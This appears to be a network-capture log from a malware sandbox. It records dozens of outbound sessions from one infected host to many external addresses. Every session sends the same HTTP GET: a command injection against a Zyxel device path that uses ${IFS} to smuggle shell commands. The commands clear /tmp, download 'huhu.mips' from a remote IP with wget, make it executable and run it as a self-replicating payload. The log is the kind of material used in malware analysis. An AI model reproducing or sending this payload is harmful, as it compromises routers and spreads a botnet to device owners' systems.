                                            Feb 2, 2024 06:21:27.939729929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8393192.168.2.1557292159.224.252.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939758062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8394192.168.2.154799834.171.229.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939778090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8395192.168.2.1545426204.129.206.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939810991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8396192.168.2.154036860.39.157.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939850092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8397192.168.2.1548410211.16.93.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939901114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8398192.168.2.1534436211.138.205.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939937115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8399192.168.2.1542946169.193.149.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939959049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8400192.168.2.1559190181.199.172.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939984083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8401192.168.2.1542678201.224.195.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940042973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8402192.168.2.1548488124.179.134.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940076113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8403192.168.2.1537698195.90.81.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940099001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8404192.168.2.15530388.229.233.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940149069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8405192.168.2.15507882.243.71.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940197945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8406192.168.2.1553024213.155.181.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940227032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8407192.168.2.1542258142.203.253.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940262079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8408192.168.2.154798068.19.254.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940309048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8409192.168.2.153759038.30.104.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940346956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8410192.168.2.1544516163.210.0.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940412045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8411192.168.2.1544594112.170.2.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940459967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8412192.168.2.153404277.114.43.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940490961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8413192.168.2.1547076204.58.214.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940536976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8414192.168.2.1536966197.250.178.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940567970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8415192.168.2.155609041.247.176.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940627098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8416192.168.2.1539620191.80.246.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940663099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8417192.168.2.1542010158.207.154.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940701008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8418192.168.2.155028242.172.3.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940726995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8419192.168.2.1553106139.24.197.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940773010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8420192.168.2.154881095.105.32.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940804005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8421192.168.2.1535850122.57.56.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940824032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8422192.168.2.1560184183.46.143.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940864086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8423192.168.2.1533006125.233.215.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940886974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8424192.168.2.1538620210.73.27.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940922022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8425192.168.2.1548734109.172.170.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940946102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8426192.168.2.1551184211.233.93.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.940973997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8427192.168.2.1546684185.120.166.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941018105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8428192.168.2.155075234.117.36.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941061020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8429192.168.2.153732250.180.42.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941103935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8430192.168.2.1553648155.75.197.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941144943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8431192.168.2.1548692118.103.170.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941174984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8432192.168.2.15524129.95.149.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941220045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8433192.168.2.1559240216.16.137.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941270113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8434192.168.2.1550828169.107.206.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941293955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8435192.168.2.1532970149.189.197.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941328049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8436192.168.2.155277254.6.97.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941369057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8437192.168.2.1536380201.239.37.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941404104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8438192.168.2.154865646.190.40.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941430092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8439192.168.2.1556868124.242.79.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941483021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8440192.168.2.1544792102.6.241.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941521883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8441192.168.2.1547396155.94.98.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941574097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8442192.168.2.1557140168.98.11.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941608906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8443192.168.2.153599296.152.115.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941653967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8444192.168.2.1534332137.244.182.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941682100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8445192.168.2.1538776163.144.138.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941715956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8446192.168.2.1548070146.179.169.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941756964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8447192.168.2.1533550132.103.132.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941791058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8448192.168.2.15395644.207.25.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941849947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8449192.168.2.153511883.222.31.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941867113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8450192.168.2.155805846.166.11.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941932917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8451192.168.2.1554872177.226.171.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.941951036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8452192.168.2.155716448.223.64.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942002058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8453192.168.2.1534342192.139.246.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942051888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8454192.168.2.1556640178.112.130.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942091942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8455192.168.2.1556028144.136.131.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.942115068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8456192.168.2.1533040120.37.47.212443
                                            TimestampBytes transferredDirectionData
